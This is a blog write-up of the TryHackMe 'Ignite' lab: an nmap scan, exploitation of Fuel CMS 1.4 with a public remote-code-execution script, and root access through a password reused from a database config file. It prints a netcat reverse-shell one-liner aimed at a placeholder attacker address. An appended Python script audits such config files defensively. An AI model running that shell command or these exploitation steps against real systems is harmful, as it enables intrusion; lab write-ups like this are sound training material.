TryHackMe: Ignite — Writeup

Tom Philippe
3 min read · Jul 7, 2021

Today, we will explain how to use a well-known CVE to exploit a vulnerable CMS. The machine we use is called Ignite and is available on TryHackMe.

Reconnaissance

As always, we start with some reconnaissance. Nmap is a tool of choice when it comes to port scanning and service detection.

# Nmap 7.91 scan initiated Wed Jul  7 08:44:03 2021 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/TryHackMe/Ignite/results/scans/_quick_tcp_nmap.txt -oX /home/kali/TryHackMe/Ignite/results/scans/xml/_quick_tcp_nmap.xml 10.10.156.102
Nmap scan report for 10.10.156.102
Host is up, received user-set (0.28s latency).
Scanned at 2021-07-07 08:44:04 EDT for 21s
Not shown: 999 closed ports
Reason: 999 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 08:44:25 2021 -- 1 IP address (1 host up) scanned in 21.30 seconds

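Nmap reports only one open port: 80/tcp, an Apache web server. The scan output also shows a robots.txt entry disallowing /fuel/ and the page title "Welcome to FUEL CMS".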

Webserver

This web server seems to be running Fuel CMS version 1.4. I have never heard of that CMS before. Maybe it has some well-known vulnerabilities. We will use searchsploit to check.

Searchsploit gives us interesting results, with 2 exploits allowing Remote Code Execution for CMS Fuel version 1.4.1. Let’s try the first exploit, a Python script. I modified it a little so I don’t have to use a proxy.

We then run the script. It asks us for a command to execute.

We open a netcat listener and then send a bash command that will open a reverse shell on our netcat listener. We use the following bash command:

rm /tmp/ykrg;mkfifo /tmp/ykrg;cat /tmp/ykrg|/bin/sh -i 2>&1|nc [attacker-ip] [port] >/tmp/ykrg

And we obtain a reverse shell as www-data.

Privilege escalation

Enumeration is key at this step. Tools such as linpeas can be useful to find passwords and other juicy information in config files. In our case, the file /var/www/html/fuel/application/config/database.php gives us a default password for root.

We try to elevate our privileges to root with this password, and it works!
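
A defender-side check for the misconfiguration used in this step, as an added example that is not part of the original writeup: the script parses a database config file and flags a root database user, a weak or default password, and world-readable permissions. The sample file is constructed, its CodeIgniter-style array layout is an assumption (the writeup does not show the file), and the weak-password list is illustrative.

```python
import os
import re
import stat
import tempfile

# Constructed sample in an assumed CodeIgniter-style array layout (the page
# does not show the file). The password is a placeholder, not the real one.
SAMPLE_CONFIG = """<?php
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'changeme',
    'database' => 'example_schema',
);
"""
# Illustrative list of weak values, not taken from the page.
WEAK_PASSWORDS = {"", "root", "password", "admin", "changeme", "toor", "123456"}
PAIR_RE = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")


def parse_db_settings(php_text):
    """Extract 'key' => 'value' string pairs from a PHP array literal."""
    return dict(PAIR_RE.findall(php_text))


def audit_db_config(path):
    """Return a sorted list of finding codes for one database config file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        settings = parse_db_settings(fh.read())
    findings = []
    if settings.get("username", "").lower() == "root":
        findings.append("db-user-is-root")
    pw = settings.get("password")
    if pw is not None and pw.lower() in WEAK_PASSWORDS:
        findings.append("weak-or-default-password")
    if os.stat(path).st_mode & stat.S_IROTH:
        findings.append("world-readable")
    return sorted(findings)


def demo():
    """Write the sample with loose permissions, audit it, then clean up."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(SAMPLE_CONFIG)
    try:
        os.chmod(fh.name, 0o644)
        return audit_db_config(fh.name)
    finally:
        os.unlink(fh.name)
```

Calling demo() audits the constructed sample; on a real host, pass the path of the application's database config to audit_db_config(). The check does not test whether the database password is reused for an operating-system account, which is what made the escalation above work.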

I hope you enjoyed the content! If so, feel free to follow me on Twitter where I share about my cybersecurity journey!
